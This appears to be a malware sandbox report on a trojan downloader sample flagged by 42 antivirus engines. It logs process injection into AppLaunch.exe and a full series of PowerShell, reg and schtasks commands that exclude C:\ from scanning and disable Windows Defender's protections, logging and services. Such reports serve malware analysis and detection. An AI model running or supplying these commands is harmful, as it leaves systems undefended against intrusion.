CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2804 thread_handle: 0x00000448 process_identifier: 2800 current_directory: filepath: track: 1 command_line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000548	1	1
NtGetContextThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000448	1	0
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2800 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000548		3221225496
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2880 thread_handle: 0x00000430 process_identifier: 2876 current_directory: filepath: track: 1 command_line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000544	1	1
NtGetContextThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000430	1	0
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2876 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000544	1	0
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELb@]à2Z0@°\|qÈÀpt,.codeð78 `.textÂÒPÔ< `.rdata304@@.data,pD@À.rsrcÀV@@ base_address: 0x00400000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: base_address: 0x00401000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: base_address: 0x00405000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: base_address: 0x00413000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: base_address: 0x00417000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: base_address: 0x00419000 process_identifier: 2876 process_handle: 0x00000544	1	1
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2876 process_handle: 0x00000544	1	1
NtSetContextThread July 6, 2023, 5:01 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198400 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000430 process_identifier: 2876	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000430 suspend_count: 1 process_identifier: 2876	1	0
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2812 thread_handle: 0x00000084 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell set-mppreference -exclusionpath C:\ filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2808	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2808	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2808	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000004a4 suspend_count: 1 process_identifier: 2808	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 2876	1	0
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2980 thread_handle: 0x0000025c process_identifier: 2976 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp\ filepath: C:\Windows\sysnative\cmd.exe track: 1 command_line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" filepath_r: C:\Windows\sysnative\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000264	1	1
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2976	1	0
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2052 thread_handle: 0x0000000000000070 process_identifier: 3068 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2080 thread_handle: 0x0000000000000074 process_identifier: 2076 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2116 thread_handle: 0x0000000000000070 process_identifier: 2112 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 152 thread_handle: 0x0000000000000074 process_identifier: 192 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2220 thread_handle: 0x0000000000000070 process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2216 thread_handle: 0x0000000000000074 process_identifier: 2228 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2460 thread_handle: 0x0000000000000070 process_identifier: 2444 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2488 thread_handle: 0x0000000000000074 process_identifier: 2516 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2660 thread_handle: 0x0000000000000070 process_identifier: 2664 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 1080 thread_handle: 0x0000000000000074 process_identifier: 2720 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2824 thread_handle: 0x0000000000000070 process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2888 thread_handle: 0x0000000000000074 process_identifier: 2892 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2608 thread_handle: 0x0000000000000070 process_identifier: 2940 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2708 thread_handle: 0x0000000000000074 process_identifier: 2656 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 3004 thread_handle: 0x0000000000000070 process_identifier: 3008 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2072 thread_handle: 0x0000000000000074 process_identifier: 2056 current_directory: C:\Users\test22\AppData\Local\Temp\FFCC.tmp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1

Stops Windows services (5 events)

service	WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start)
service	WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start)
service	WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start)
service	WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start)
service	WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start)

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Lionic	Trojan.Win32.Agent.Y!c
MicroWorld-eScan	IL:Trojan.MSILMamut.11530
McAfee	Artemis!45DCE82D48AA
Malwarebytes	Malware.AI.2777715657
K7AntiVirus	Trojan-Downloader ( 005a828d1 )
Alibaba	TrojanDownloader:MSIL/GenKryptik.2fd43758
K7GW	Trojan-Downloader ( 005a828d1 )
Arcabit	IL:Trojan.MSILMamut.D2D0A
VirIT	Trojan.Win32.MSIL_Heur.A
Cyren	W32/ABRisk.POHX-6913
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.PJS
Cynet	Malicious (score: 99)
APEX	Malicious
Kaspersky	HEUR:Trojan-Downloader.MSIL.Agent.gen
BitDefender	IL:Trojan.MSILMamut.11530
Avast	Win32:DropperX-gen [Drp]
Tencent	Malware.Win32.Gencirc.13e4dee7
Emsisoft	IL:Trojan.MSILMamut.11530 (B)
F-Secure	Trojan.TR/Dldr.Agent.roczu
VIPRE	IL:Trojan.MSILMamut.11530
McAfee-GW-Edition	Artemis!Trojan
FireEye	IL:Trojan.MSILMamut.11530
Sophos	Mal/Generic-S
Avira	TR/Dldr.Agent.roczu
Antiy-AVL	Trojan/MSIL.AgentTesla
Microsoft	Trojan:MSIL/AgentTesla.ASBB!MTB
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.Agent.gen
GData	IL:Trojan.MSILMamut.11530
Google	Detected
AhnLab-V3	Trojan/Win.MSILZilla.C5449222
ALYac	IL:Trojan.MSILMamut.11530
MAX	malware (ai score=85)
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H0DG323
Rising	Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:lAIfxRBWCZSVw0GOzmOl3A)
Ikarus	Trojan.MSIL.Agent
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.PJS!tr.dldr
AVG	Win32:DropperX-gen [Drp]
DeepInstinct	MALICIOUS

Wllcsochcbi.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All